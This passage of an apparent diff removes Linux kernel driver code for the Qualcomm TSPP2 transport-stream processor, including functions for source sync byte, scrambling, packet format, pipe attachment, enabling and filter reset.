-- break;
-- default:
-- pr_err("%s: Invalid option %d\n", __func__, option);
-- mutex_unlock(&src->device->mutex);
-- pm_runtime_mark_last_busy(src->device->dev);
-- pm_runtime_put_autosuspend(src->device->dev);
-- return -EINVAL;
-- }
--
-- mutex_unlock(&src->device->mutex);
--
-- pm_runtime_mark_last_busy(src->device->dev);
-- pm_runtime_put_autosuspend(src->device->dev);
--
-- dev_dbg(src->device->dev, "%s: successful\n", __func__);
--
-- return 0;
--}
--EXPORT_SYMBOL(tspp2_src_parsing_option_get);
--
--/**
-- * tspp2_src_sync_byte_config_set() - Set source sync byte configuration.
-- *
-- * @src_handle: Source to configure.
-- * @check_sync_byte: Check TS packet sync byte.
-- * @sync_byte_value: Sync byte value to check (e.g., 0x47).
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_src_sync_byte_config_set(u32 src_handle,
-- int check_sync_byte,
-- u8 sync_byte_value)
--{
-- int ret;
-- u32 reg = 0;
-- struct tspp2_src *src = (struct tspp2_src *)src_handle;
--
-- if (!src) {
-- pr_err("%s: Invalid source handle\n", __func__);
-- return -EINVAL;
-- }
--
-- ret = pm_runtime_get_sync(src->device->dev);
-- if (ret < 0)
-- return ret;
--
-- if (mutex_lock_interruptible(&src->device->mutex)) {
-- pm_runtime_mark_last_busy(src->device->dev);
-- pm_runtime_put_autosuspend(src->device->dev);
-- return -ERESTARTSYS;
-- }
--
-- if (!src->device->opened) {
-- pr_err("%s: Device must be opened first\n", __func__);
-- mutex_unlock(&src->device->mutex);
-- pm_runtime_mark_last_busy(src->device->dev);
-- pm_runtime_put_autosuspend(src->device->dev);
-- return -EPERM;
-- }
--
-- if (!src->opened) {
-- pr_err("%s: Source not opened\n", __func__);
-- mutex_unlock(&src->device->mutex);
-- pm_runtime_mark_last_busy(src->device->dev);
-- pm_runtime_put_autosuspend(src->device->dev);
-- return -EINVAL;
-- }
--
-- reg = readl_relaxed(src->device->base +
-- TSPP2_SRC_CONFIG(src->hw_index));
--
-- if (check_sync_byte)
-- reg |= (0x1 << SRC_CONFIG_CHECK_SYNC_OFFS);
-- else
-- reg &= ~(0x1 << SRC_CONFIG_CHECK_SYNC_OFFS);
--
-- reg &= ~(0xFF << SRC_CONFIG_SYNC_BYTE_OFFS);
-- reg |= (sync_byte_value << SRC_CONFIG_SYNC_BYTE_OFFS);
--
-- writel_relaxed(reg, src->device->base +
-- TSPP2_SRC_CONFIG(src->hw_index));
--
-- mutex_unlock(&src->device->mutex);
--
-- pm_runtime_mark_last_busy(src->device->dev);
-- pm_runtime_put_autosuspend(src->device->dev);
--
-- dev_dbg(src->device->dev, "%s: successful\n", __func__);
--
-- return 0;
--}
--EXPORT_SYMBOL(tspp2_src_sync_byte_config_set);
--
--/**
-- * tspp2_src_sync_byte_config_get() - Get source sync byte configuration.
-- *
-- * @src_handle: Source handle.
-- * @check_sync_byte: Check TS packet sync byte indication.
-- * @sync_byte_value: Sync byte value.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_src_sync_byte_config_get(u32 src_handle,
-- int *check_sync_byte,
-- u8 *sync_byte_value)
--{
-- int ret;
-- u32 reg = 0;
-- struct tspp2_src *src = (struct tspp2_src *)src_handle;
--
-- if (!src) {
-- pr_err("%s: Invalid source handle\n", __func__);
-- return -EINVAL;
-- }
-- if (!check_sync_byte || !sync_byte_value) {
-- pr_err("%s: NULL pointer\n", __func__);
-- return -EINVAL;
-- }
--
-- ret = pm_runtime_get_sync(src->device->dev);
-- if (ret < 0)
-- return ret;
--
-- if (mutex_lock_interruptible(&src->device->mutex)) {
-- pm_runtime_mark_last_busy(src->device->dev);
-- pm_runtime_put_autosuspend(src->device->dev);
-- return -ERESTARTSYS;
-- }
--
-- if (!src->device->opened) {
-- pr_err("%s: Device must be opened first\n", __func__);
-- mutex_unlock(&src->device->mutex);
-- pm_runtime_mark_last_busy(src->device->dev);
-- pm_runtime_put_autosuspend(src->device->dev);
-- return -EPERM;
-- }
--
-- if (!src->opened) {
-- pr_err("%s: Source not opened\n", __func__);
-- mutex_unlock(&src->device->mutex);
-- pm_runtime_mark_last_busy(src->device->dev);
-- pm_runtime_put_autosuspend(src->device->dev);
-- return -EINVAL;
-- }
--
-- reg = readl_relaxed(src->device->base +
-- TSPP2_SRC_CONFIG(src->hw_index));
--
-- *check_sync_byte = (reg >> SRC_CONFIG_CHECK_SYNC_OFFS) & 0x1;
-- *sync_byte_value = (reg >> SRC_CONFIG_SYNC_BYTE_OFFS) & 0xFF;
--
-- mutex_unlock(&src->device->mutex);
--
-- pm_runtime_mark_last_busy(src->device->dev);
-- pm_runtime_put_autosuspend(src->device->dev);
--
-- dev_dbg(src->device->dev, "%s: successful\n", __func__);
--
-- return 0;
--}
--EXPORT_SYMBOL(tspp2_src_sync_byte_config_get);
--
--/**
-- * tspp2_src_scrambling_config_set() - Set source scrambling configuration.
-- *
-- * @src_handle: Source to configure.
-- * @cfg: Scrambling configuration to set.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_src_scrambling_config_set(u32 src_handle,
-- const struct tspp2_src_scrambling_config *cfg)
--{
-- int ret;
-- u32 reg = 0;
-- struct tspp2_src *src = (struct tspp2_src *)src_handle;
--
-- if (!src) {
-- pr_err("%s: Invalid source handle\n", __func__);
-- return -EINVAL;
-- }
-- if (!cfg) {
-- pr_err("%s: NULL pointer\n", __func__);
-- return -EINVAL;
-- }
--
-- ret = pm_runtime_get_sync(src->device->dev);
-- if (ret < 0)
-- return ret;
--
-- if (mutex_lock_interruptible(&src->device->mutex)) {
-- pm_runtime_mark_last_busy(src->device->dev);
-- pm_runtime_put_autosuspend(src->device->dev);
-- return -ERESTARTSYS;
-- }
--
-- if (!src->device->opened) {
-- pr_err("%s: Device must be opened first\n", __func__);
-- mutex_unlock(&src->device->mutex);
-- pm_runtime_mark_last_busy(src->device->dev);
-- pm_runtime_put_autosuspend(src->device->dev);
-- return -EPERM;
-- }
--
-- if (!src->opened) {
-- pr_err("%s: Source not opened\n", __func__);
-- mutex_unlock(&src->device->mutex);
-- pm_runtime_mark_last_busy(src->device->dev);
-- pm_runtime_put_autosuspend(src->device->dev);
-- return -EINVAL;
-- }
--
-- reg = readl_relaxed(src->device->base +
-- TSPP2_SRC_CONFIG(src->hw_index));
--
-- /* Clear all scrambling configuration bits before setting them */
-- reg &= ~(0x3 << SRC_CONFIG_SCRAMBLING0_OFFS);
-- reg &= ~(0x3 << SRC_CONFIG_SCRAMBLING1_OFFS);
-- reg &= ~(0x3 << SRC_CONFIG_SCRAMBLING2_OFFS);
-- reg &= ~(0x3 << SRC_CONFIG_SCRAMBLING3_OFFS);
-- reg &= ~(0x3 << SRC_CONFIG_SCRAMBLING_MONITOR_OFFS);
--
-- reg |= (cfg->scrambling_0_ctrl << SRC_CONFIG_SCRAMBLING0_OFFS);
-- reg |= (cfg->scrambling_1_ctrl << SRC_CONFIG_SCRAMBLING1_OFFS);
-- reg |= (cfg->scrambling_2_ctrl << SRC_CONFIG_SCRAMBLING2_OFFS);
-- reg |= (cfg->scrambling_3_ctrl << SRC_CONFIG_SCRAMBLING3_OFFS);
-- reg |= (cfg->scrambling_bits_monitoring <<
-- SRC_CONFIG_SCRAMBLING_MONITOR_OFFS);
--
-- writel_relaxed(reg, src->device->base +
-- TSPP2_SRC_CONFIG(src->hw_index));
--
--
src->scrambling_bits_monitoring = cfg->scrambling_bits_monitoring;
--
-- mutex_unlock(&src->device->mutex);
--
-- pm_runtime_mark_last_busy(src->device->dev);
-- pm_runtime_put_autosuspend(src->device->dev);
--
-- dev_dbg(src->device->dev, "%s: successful\n", __func__);
--
-- return 0;
--}
--EXPORT_SYMBOL(tspp2_src_scrambling_config_set);
--
--/**
-- * tspp2_src_scrambling_config_get() - Get source scrambling configuration.
-- *
-- * @src_handle: Source handle.
-- * @cfg: Scrambling configuration.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_src_scrambling_config_get(u32 src_handle,
-- struct tspp2_src_scrambling_config *cfg)
--{
-- int ret;
-- u32 reg = 0;
-- struct tspp2_src *src = (struct tspp2_src *)src_handle;
--
-- if (!src) {
-- pr_err("%s: Invalid source handle\n", __func__);
-- return -EINVAL;
-- }
-- if (!cfg) {
-- pr_err("%s: NULL pointer\n", __func__);
-- return -EINVAL;
-- }
--
-- ret = pm_runtime_get_sync(src->device->dev);
-- if (ret < 0)
-- return ret;
--
-- if (mutex_lock_interruptible(&src->device->mutex)) {
-- pm_runtime_mark_last_busy(src->device->dev);
-- pm_runtime_put_autosuspend(src->device->dev);
-- return -ERESTARTSYS;
-- }
--
-- if (!src->device->opened) {
-- pr_err("%s: Device must be opened first\n", __func__);
-- mutex_unlock(&src->device->mutex);
-- pm_runtime_mark_last_busy(src->device->dev);
-- pm_runtime_put_autosuspend(src->device->dev);
-- return -EPERM;
-- }
--
-- if (!src->opened) {
-- pr_err("%s: Source not opened\n", __func__);
-- mutex_unlock(&src->device->mutex);
-- pm_runtime_mark_last_busy(src->device->dev);
-- pm_runtime_put_autosuspend(src->device->dev);
-- return -EINVAL;
-- }
--
-- reg = readl_relaxed(src->device->base +
-- TSPP2_SRC_CONFIG(src->hw_index));
--
-- cfg->scrambling_0_ctrl = ((reg >> SRC_CONFIG_SCRAMBLING0_OFFS) & 0x3);
-- cfg->scrambling_1_ctrl = ((reg >> SRC_CONFIG_SCRAMBLING1_OFFS) & 0x3);
-- cfg->scrambling_2_ctrl = ((reg >> SRC_CONFIG_SCRAMBLING2_OFFS) & 0x3);
--
cfg->scrambling_3_ctrl = ((reg >> SRC_CONFIG_SCRAMBLING3_OFFS) & 0x3);
-- cfg->scrambling_bits_monitoring =
-- ((reg >> SRC_CONFIG_SCRAMBLING_MONITOR_OFFS) & 0x3);
--
-- mutex_unlock(&src->device->mutex);
--
-- pm_runtime_mark_last_busy(src->device->dev);
-- pm_runtime_put_autosuspend(src->device->dev);
--
-- dev_dbg(src->device->dev, "%s: successful\n", __func__);
--
-- return 0;
--}
--EXPORT_SYMBOL(tspp2_src_scrambling_config_get);
--
--/**
-- * tspp2_src_packet_format_set() - Set source packet size and format.
-- *
-- * @src_handle: Source to configure.
-- * @format: Packet format.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_src_packet_format_set(u32 src_handle,
-- enum tspp2_packet_format format)
--{
-- int ret;
-- u32 reg = 0;
-- struct tspp2_src *src = (struct tspp2_src *)src_handle;
--
-- if (!src) {
-- pr_err("%s: Invalid source handle\n", __func__);
-- return -EINVAL;
-- }
--
-- ret = pm_runtime_get_sync(src->device->dev);
-- if (ret < 0)
-- return ret;
--
-- if (mutex_lock_interruptible(&src->device->mutex)) {
-- pm_runtime_mark_last_busy(src->device->dev);
-- pm_runtime_put_autosuspend(src->device->dev);
-- return -ERESTARTSYS;
-- }
--
-- if (!src->device->opened) {
-- pr_err("%s: Device must be opened first\n", __func__);
-- mutex_unlock(&src->device->mutex);
-- pm_runtime_mark_last_busy(src->device->dev);
-- pm_runtime_put_autosuspend(src->device->dev);
-- return -EPERM;
-- }
--
-- if (!src->opened) {
-- pr_err("%s: Source not opened\n", __func__);
-- mutex_unlock(&src->device->mutex);
-- pm_runtime_mark_last_busy(src->device->dev);
-- pm_runtime_put_autosuspend(src->device->dev);
-- return -EINVAL;
-- }
--
-- if (src->input == TSPP2_INPUT_MEMORY) {
-- reg = readl_relaxed(src->device->base +
-- TSPP2_MEM_INPUT_SRC_CONFIG(src->hw_index));
--
-- reg &= ~(0x1 << MEM_INPUT_SRC_CONFIG_STAMP_SUFFIX_OFFS);
-- reg &= ~(0x1 << MEM_INPUT_SRC_CONFIG_STAMP_EN_OFFS);
--
-- switch (format) {
-- case TSPP2_PACKET_FORMAT_188_RAW:
-- /* We
do not need to set any bit */ -- break; -- case TSPP2_PACKET_FORMAT_192_HEAD: -- reg |= (0x1 << MEM_INPUT_SRC_CONFIG_STAMP_EN_OFFS); -- break; -- case TSPP2_PACKET_FORMAT_192_TAIL: -- reg |= (0x1 << MEM_INPUT_SRC_CONFIG_STAMP_EN_OFFS); -- reg |= (0x1 << MEM_INPUT_SRC_CONFIG_STAMP_SUFFIX_OFFS); -- break; -- default: -- pr_err("%s: Unknown packet format\n", __func__); -- mutex_unlock(&src->device->mutex); -- pm_runtime_mark_last_busy(src->device->dev); -- pm_runtime_put_autosuspend(src->device->dev); -- return -EINVAL; -- } -- writel_relaxed(reg, src->device->base + -- TSPP2_MEM_INPUT_SRC_CONFIG(src->hw_index)); -- } -- src->pkt_format = format; -- -- /* Update source's input pipe threshold if needed */ -- if (src->input_pipe) { -- if (src->pkt_format == TSPP2_PACKET_FORMAT_188_RAW) -- src->input_pipe->threshold = 188; -- else -- src->input_pipe->threshold = 192; -- -- writel_relaxed(src->input_pipe->threshold, -- src->input_pipe->device->base + -- TSPP2_PIPE_THRESH_CONFIG(src->input_pipe->hw_index)); -- } -- -- mutex_unlock(&src->device->mutex); -- -- pm_runtime_mark_last_busy(src->device->dev); -- pm_runtime_put_autosuspend(src->device->dev); -- -- dev_dbg(src->device->dev, "%s: successful\n", __func__); -- -- return 0; --} --EXPORT_SYMBOL(tspp2_src_packet_format_set); -- --/** -- * tspp2_src_pipe_attach() - Attach a pipe to a source. -- * -- * @src_handle: Source to attach the pipe to. -- * @pipe_handle: Pipe to attach to the source. -- * @cfg: For output pipes - the pipe's pull mode parameters. -- * It is not allowed to pass NULL for output pipes. -- * For input pipes this is irrelevant and the caller can -- * pass NULL. -- * -- * This function attaches a given pipe to a given source. -- * The pipe's mode (input or output) was set when the pipe was opened. -- * An input pipe can be attached to a single source (with memory input). -- * A source can have multiple output pipes attached, and an output pipe can -- * be attached to multiple sources. 
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_src_pipe_attach(u32 src_handle,
-- u32 pipe_handle,
-- const struct tspp2_pipe_pull_mode_params *cfg)
--{
-- int ret;
-- struct tspp2_src *src = (struct tspp2_src *)src_handle;
-- struct tspp2_pipe *pipe = (struct tspp2_pipe *)pipe_handle;
-- struct tspp2_output_pipe *output_pipe = NULL;
-- u32 reg;
--
-- if (!src || !pipe) {
-- pr_err("%s: Invalid source or pipe handle\n", __func__);
-- return -EINVAL;
-- }
--
-- ret = pm_runtime_get_sync(src->device->dev);
-- if (ret < 0)
-- return ret;
--
-- if (mutex_lock_interruptible(&src->device->mutex)) {
-- pm_runtime_mark_last_busy(src->device->dev);
-- pm_runtime_put_autosuspend(src->device->dev);
-- return -ERESTARTSYS;
-- }
--
-- if (!src->device->opened) {
-- pr_err("%s: Device must be opened first\n", __func__);
-- mutex_unlock(&src->device->mutex);
-- pm_runtime_mark_last_busy(src->device->dev);
-- pm_runtime_put_autosuspend(src->device->dev);
-- return -EPERM;
-- }
--
-- if (!src->opened) {
-- pr_err("%s: Source not opened\n", __func__);
-- goto err_inval;
-- }
--
-- if (!pipe->opened) {
-- pr_err("%s: Pipe not opened\n", __func__);
-- goto err_inval;
-- }
-- if ((pipe->cfg.pipe_mode == TSPP2_SRC_PIPE_OUTPUT) && (cfg == NULL)) {
-- pr_err("%s: Invalid pull mode parameters\n", __func__);
-- goto err_inval;
-- }
--
-- if (pipe->cfg.pipe_mode == TSPP2_SRC_PIPE_INPUT) {
-- if (src->input_pipe != NULL) {
-- pr_err("%s: Source already has an input pipe attached\n",
-- __func__);
-- goto err_inval;
-- }
-- if (pipe->ref_cnt > 0) {
-- pr_err(
-- "%s: Pipe %u is already attached to a source. An input pipe can only be attached once\n",
-- __func__, pipe_handle);
-- goto err_inval;
-- }
-- /*
-- * Input pipe threshold is determined according to the
-- * source's packet size.
-- */
-- if (src->pkt_format == TSPP2_PACKET_FORMAT_188_RAW)
-- pipe->threshold = 188;
-- else
-- pipe->threshold = 192;
--
-- src->input_pipe = pipe;
--
-- reg = readl_relaxed(src->device->base +
-- TSPP2_MEM_INPUT_SRC_CONFIG(src->hw_index));
-- reg &= ~(0x1F << MEM_INPUT_SRC_CONFIG_INPUT_PIPE_OFFS);
-- reg |= (pipe->hw_index << MEM_INPUT_SRC_CONFIG_INPUT_PIPE_OFFS);
-- writel_relaxed(reg, src->device->base +
-- TSPP2_MEM_INPUT_SRC_CONFIG(src->hw_index));
-- } else {
-- list_for_each_entry(output_pipe,
-- &src->output_pipe_list, link) {
-- if (output_pipe->pipe == pipe) {
-- pr_err(
-- "%s: Output pipe %u is already attached to source %u\n",
-- __func__, pipe_handle, src_handle);
-- goto err_inval;
-- }
-- }
-- output_pipe = kmalloc(sizeof(struct tspp2_output_pipe),
-- GFP_KERNEL);
-- if (!output_pipe) {
-- pr_err("%s: No memory to save output pipe\n", __func__);
-- mutex_unlock(&src->device->mutex);
-- pm_runtime_mark_last_busy(src->device->dev);
-- pm_runtime_put_autosuspend(src->device->dev);
-- return -ENOMEM;
-- }
-- output_pipe->pipe = pipe;
-- pipe->threshold = (cfg->threshold & 0xFFFF);
-- list_add_tail(&output_pipe->link, &src->output_pipe_list);
--
-- reg = readl_relaxed(src->device->base +
-- TSPP2_SRC_DEST_PIPES(src->hw_index));
-- if (cfg->is_stalling)
-- reg |= (0x1 << pipe->hw_index);
-- else
-- reg &= ~(0x1 << pipe->hw_index);
-- writel_relaxed(reg, src->device->base +
-- TSPP2_SRC_DEST_PIPES(src->hw_index));
-- }
--
-- reg = readl_relaxed(pipe->device->base +
-- TSPP2_PIPE_THRESH_CONFIG(pipe->hw_index));
-- if ((pipe->cfg.pipe_mode == TSPP2_SRC_PIPE_OUTPUT) &&
-- (pipe->ref_cnt > 0) && (pipe->threshold != (reg & 0xFFFF))) {
-- pr_warn("%s: overwriting output pipe threshold\n", __func__);
-- }
--
-- writel_relaxed(pipe->threshold, pipe->device->base +
-- TSPP2_PIPE_THRESH_CONFIG(pipe->hw_index));
--
-- pipe->ref_cnt++;
-- src->num_associated_pipes++;
--
-- mutex_unlock(&src->device->mutex);
--
-- pm_runtime_mark_last_busy(src->device->dev);
-- pm_runtime_put_autosuspend(src->device->dev);
--
-- dev_dbg(src->device->dev, "%s: successful\n", __func__);
--
-- return 0;
--
--err_inval:
-- mutex_unlock(&src->device->mutex);
-- pm_runtime_mark_last_busy(src->device->dev);
-- pm_runtime_put_autosuspend(src->device->dev);
--
-- return -EINVAL;
--}
--EXPORT_SYMBOL(tspp2_src_pipe_attach);
--
--/**
-- * tspp2_src_pipe_detach() - Detach a pipe from a source.
-- *
-- * @src_handle: Source to detach the pipe from.
-- * @pipe_handle: Pipe to detach from the source.
-- *
-- * Detaches a pipe from a source. The given pipe should have been previously
-- * attached to this source as either an input pipe or an output pipe.
-- * Note: there is no checking if this pipe is currently defined as the output
-- * pipe of any operation!
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_src_pipe_detach(u32 src_handle, u32 pipe_handle)
--{
-- int ret;
-- struct tspp2_src *src = (struct tspp2_src *)src_handle;
-- struct tspp2_pipe *pipe = (struct tspp2_pipe *)pipe_handle;
-- struct tspp2_output_pipe *output_pipe = NULL;
-- int found = 0;
-- u32 reg;
--
-- if (!src || !pipe) {
-- pr_err("%s: Invalid source or pipe handle\n", __func__);
-- return -EINVAL;
-- }
--
-- ret = pm_runtime_get_sync(src->device->dev);
-- if (ret < 0)
-- return ret;
--
-- mutex_lock(&src->device->mutex);
--
-- if (!src->device->opened) {
-- pr_err("%s: Device must be opened first\n", __func__);
-- mutex_unlock(&src->device->mutex);
-- pm_runtime_mark_last_busy(src->device->dev);
-- pm_runtime_put_autosuspend(src->device->dev);
-- return -EPERM;
-- }
--
-- if (!src->opened) {
-- pr_err("%s: Source not opened\n", __func__);
-- goto err_inval;
-- }
--
-- if (!pipe->opened) {
-- pr_err("%s: Pipe not opened\n", __func__);
-- goto err_inval;
-- }
--
-- if (pipe->cfg.pipe_mode == TSPP2_SRC_PIPE_INPUT) {
-- if (src->input_pipe != pipe) {
-- pr_err(
-- "%s: Input pipe %u is not attached to source %u\n",
-- __func__, pipe_handle, src_handle);
-- goto err_inval;
-- }
--
-- writel_relaxed(0xFFFF, src->input_pipe->device->base +
-- TSPP2_PIPE_THRESH_CONFIG(src->input_pipe->hw_index));
--
-- if (src->enabled) {
-- pr_warn("%s: Detaching input pipe from an active memory source\n",
-- __func__);
-- }
-- /*
-- * Note: not updating TSPP2_MEM_INPUT_SRC_CONFIG to reflect
-- * this pipe is detached, since there is no invalid value we
-- * can write instead. tspp2_src_pipe_attach() already takes
-- * care of zeroing the relevant bit-field before writing the
-- * new pipe nummber.
-- */
--
-- src->input_pipe = NULL;
-- } else {
-- list_for_each_entry(output_pipe,
-- &src->output_pipe_list, link) {
-- if (output_pipe->pipe == pipe) {
-- found = 1;
-- break;
-- }
-- }
-- if (found) {
-- list_del(&output_pipe->link);
-- kfree(output_pipe);
-- reg = readl_relaxed(src->device->base +
-- TSPP2_SRC_DEST_PIPES(src->hw_index));
-- reg &= ~(0x1 << pipe->hw_index);
-- writel_relaxed(reg, src->device->base +
-- TSPP2_SRC_DEST_PIPES(src->hw_index));
-- if (pipe->ref_cnt == 1) {
-- writel_relaxed(0xFFFF, pipe->device->base +
-- TSPP2_PIPE_THRESH_CONFIG(
-- pipe->hw_index));
-- }
-- } else {
-- pr_err("%s: Output pipe %u is not attached to source %u\n",
-- __func__, pipe_handle, src_handle);
-- goto err_inval;
-- }
-- }
-- pipe->ref_cnt--;
-- src->num_associated_pipes--;
--
-- mutex_unlock(&src->device->mutex);
--
-- pm_runtime_mark_last_busy(src->device->dev);
-- pm_runtime_put_autosuspend(src->device->dev);
--
-- dev_dbg(src->device->dev, "%s: successful\n", __func__);
--
-- return 0;
--
--err_inval:
-- mutex_unlock(&src->device->mutex);
-- pm_runtime_mark_last_busy(src->device->dev);
-- pm_runtime_put_autosuspend(src->device->dev);
--
-- return -EINVAL;
--}
--EXPORT_SYMBOL(tspp2_src_pipe_detach);
--
--/**
-- * tspp2_src_enable() - Enable source.
-- *
-- * @src_handle: Source to enable.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_src_enable(u32 src_handle)
--{
-- struct tspp2_src *src = (struct tspp2_src *)src_handle;
-- u32 reg;
-- int ret;
--
-- if (!src) {
-- pr_err("%s: Invalid source handle\n", __func__);
-- return -EINVAL;
-- }
--
-- ret = pm_runtime_get_sync(src->device->dev);
-- if (ret < 0)
-- return ret;
--
-- if (mutex_lock_interruptible(&src->device->mutex)) {
-- pm_runtime_mark_last_busy(src->device->dev);
-- pm_runtime_put_autosuspend(src->device->dev);
-- return -ERESTARTSYS;
-- }
--
-- if (!src->device->opened) {
-- pr_err("%s: Device must be opened first\n", __func__);
-- mutex_unlock(&src->device->mutex);
-- pm_runtime_mark_last_busy(src->device->dev);
-- pm_runtime_put_autosuspend(src->device->dev);
-- return -EPERM;
-- }
--
-- if (!src->opened) {
-- pr_err("%s: Source not opened\n", __func__);
-- mutex_unlock(&src->device->mutex);
-- pm_runtime_mark_last_busy(src->device->dev);
-- pm_runtime_put_autosuspend(src->device->dev);
-- return -EINVAL;
-- }
--
-- if (src->enabled) {
-- pr_warn("%s: Source already enabled\n", __func__);
-- mutex_unlock(&src->device->mutex);
-- pm_runtime_mark_last_busy(src->device->dev);
-- pm_runtime_put_autosuspend(src->device->dev);
-- return 0;
-- }
--
-- /*
-- * Memory sources require their input pipe to be configured
-- * before enabling the source.
-- */
-- if ((src->input == TSPP2_INPUT_MEMORY) && (src->input_pipe == NULL)) {
-- pr_err("%s: A memory source must have an input pipe attached before enabling the source",
-- __func__);
-- mutex_unlock(&src->device->mutex);
-- pm_runtime_mark_last_busy(src->device->dev);
-- pm_runtime_put_autosuspend(src->device->dev);
-- return -EINVAL;
-- }
--
-- if (src->device->num_enabled_sources == 0) {
-- ret = tspp2_clock_start(src->device);
-- if (ret) {
-- mutex_unlock(&src->device->mutex);
-- pm_runtime_mark_last_busy(src->device->dev);
-- pm_runtime_put_autosuspend(src->device->dev);
-- return ret;
-- }
-- __pm_stay_awake(&src->device->wakeup_src);
-- }
--
-- if ((src->input == TSPP2_INPUT_TSIF0) ||
-- (src->input == TSPP2_INPUT_TSIF1)) {
-- tspp2_tsif_start(&src->device->tsif_devices[src->input]);
--
-- reg = readl_relaxed(src->device->base +
-- TSPP2_TSIF_INPUT_SRC_CONFIG(src->input));
-- reg |= (0x1 << TSIF_INPUT_SRC_CONFIG_INPUT_EN_OFFS);
-- writel_relaxed(reg, src->device->base +
-- TSPP2_TSIF_INPUT_SRC_CONFIG(src->input));
-- } else {
-- reg = readl_relaxed(src->device->base +
-- TSPP2_MEM_INPUT_SRC_CONFIG(src->hw_index));
-- reg |= (0x1 << MEM_INPUT_SRC_CONFIG_INPUT_EN_OFFS);
-- writel_relaxed(reg, src->device->base +
-- TSPP2_MEM_INPUT_SRC_CONFIG(src->hw_index));
-- }
--
-- src->enabled = 1;
-- src->device->num_enabled_sources++;
--
-- mutex_unlock(&src->device->mutex);
--
-- pm_runtime_mark_last_busy(src->device->dev);
-- pm_runtime_put_autosuspend(src->device->dev);
--
-- dev_dbg(src->device->dev, "%s: successful\n", __func__);
--
-- return 0;
--}
--EXPORT_SYMBOL(tspp2_src_enable);
--
--/**
-- * tspp2_src_disable() - Disable source.
-- *
-- * @src_handle: Source to disable.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_src_disable(u32 src_handle)
--{
-- struct tspp2_src *src = (struct tspp2_src *)src_handle;
-- int ret;
--
-- if (!src) {
-- pr_err("%s: Invalid source handle\n", __func__);
-- return -EINVAL;
-- }
--
-- ret = pm_runtime_get_sync(src->device->dev);
-- if (ret < 0)
-- return ret;
--
-- mutex_lock(&src->device->mutex);
--
-- if (!src->device->opened) {
-- pr_err("%s: Device must be opened first\n", __func__);
-- mutex_unlock(&src->device->mutex);
-- pm_runtime_mark_last_busy(src->device->dev);
-- pm_runtime_put_autosuspend(src->device->dev);
-- return -EPERM;
-- }
--
-- ret = tspp2_src_disable_internal(src);
--
-- mutex_unlock(&src->device->mutex);
--
-- pm_runtime_mark_last_busy(src->device->dev);
-- pm_runtime_put_autosuspend(src->device->dev);
--
-- if (!ret)
-- dev_dbg(src->device->dev, "%s: successful\n", __func__);
--
-- return ret;
--}
--EXPORT_SYMBOL(tspp2_src_disable);
--
--/**
-- * tspp2_filter_ops_clear() - Clear filter operations database and HW
-- *
-- * @filter: The filter to work on.
-- */
--static void tspp2_filter_ops_clear(struct tspp2_filter *filter)
--{
-- int i;
--
-- /* Set all filter operations in HW to Exit operation */
-- for (i = 0; i < TSPP2_MAX_OPS_PER_FILTER; i++) {
-- writel_relaxed(TSPP2_OPCODE_EXIT, filter->device->base +
-- TSPP2_OPCODE(filter->hw_index, i));
-- }
-- memset(filter->operations, 0,
-- (sizeof(struct tspp2_operation) * TSPP2_MAX_OPS_PER_FILTER));
-- filter->num_user_operations = 0;
-- filter->indexing_op_set = 0;
-- filter->raw_op_with_indexing = 0;
-- filter->pes_analysis_op_set = 0;
-- filter->raw_op_set = 0;
-- filter->pes_tx_op_set = 0;
--}
--
--/**
-- * tspp2_filter_context_reset() - Reset filter context and release it.
-- *
-- * @filter: The filter to work on.
-- */
--static void tspp2_filter_context_reset(struct tspp2_filter *filter)
--{
-- /* Reset this filter's context. Each register handles 32 contexts */
-- writel_relaxed((0x1 << TSPP2_MODULUS_OP(filter->context, 32)),
-- filter->device->base +
-- TSPP2_TSP_CONTEXT_RESET(filter->context >> 5));
-- writel_relaxed((0x1 << TSPP2_MODULUS_OP(filter->context, 32)),
-- filter->device->base +
-- TSPP2_PES_CONTEXT_RESET(filter->context >> 5));
-- writel_relaxed((0x1 << TSPP2_MODULUS_OP(filter->context, 32)),
-- filter->device->base +
-- TSPP2_INDEXING_CONTEXT_RESET(filter->context >> 5));
--
-- writel_relaxed(0, filter->device->base +
-- TSPP2_FILTER_ENTRY1(filter->hw_index));
--
-- /* Release context */
-- filter->device->contexts[filter->context] = 0;
--}
--
--/**
-- * tspp2_filter_sw_reset() - Reset filter SW fields helper function.
-- *
-- * @filter: The filter to work on.
-- */
--static void tspp2_filter_sw_reset(struct tspp2_filter *filter)
--{
-- unsigned long flags;
-- /*
-- * All fields are cleared when opening a filter. Still it is important
-- * to reset some of the fields here, specifically to set opened to 0 and
-- * also to set the callback to NULL.
-- */
-- filter->opened = 0;
-- filter->src = NULL;
-- filter->batch = NULL;
-- filter->context = 0;
-- filter->hw_index = 0;
-- filter->pid_value = 0;
-- filter->mask = 0;
-- spin_lock_irqsave(&filter->device->spinlock, flags);
-- filter->event_callback = NULL;
-- filter->event_cookie = NULL;
-- filter->event_bitmask = 0;
-- spin_unlock_irqrestore(&filter->device->spinlock, flags);
-- filter->enabled = 0;
--}
--
--/**
-- * tspp2_src_batch_set() - Set/clear a filter batch to/from a source.
-- *
-- * @src: The source to work on.
-- * @batch_id: The batch to set/clear.
-- * @set: Set/clear flag.
-- */
--static void tspp2_src_batch_set(struct tspp2_src *src, u8 batch_id, int set)
--{
-- u32 reg = 0;
--
-- if (src->input == TSPP2_INPUT_MEMORY) {
-- reg = readl_relaxed(src->device->base +
-- TSPP2_MEM_INPUT_SRC_CONFIG(src->hw_index));
-- if (set)
-- reg |= ((1 << batch_id) <<
-- MEM_INPUT_SRC_CONFIG_BATCHES_OFFS);
-- else
-- reg &= ~((1 << batch_id) <<
-- MEM_INPUT_SRC_CONFIG_BATCHES_OFFS);
-- writel_relaxed(reg, src->device->base +
-- TSPP2_MEM_INPUT_SRC_CONFIG(src->hw_index));
-- } else {
-- reg = readl_relaxed(src->device->base +
-- TSPP2_TSIF_INPUT_SRC_CONFIG(src->input));
-- if (set)
-- reg |= ((1 << batch_id) <<
-- TSIF_INPUT_SRC_CONFIG_BATCHES_OFFS);
-- else
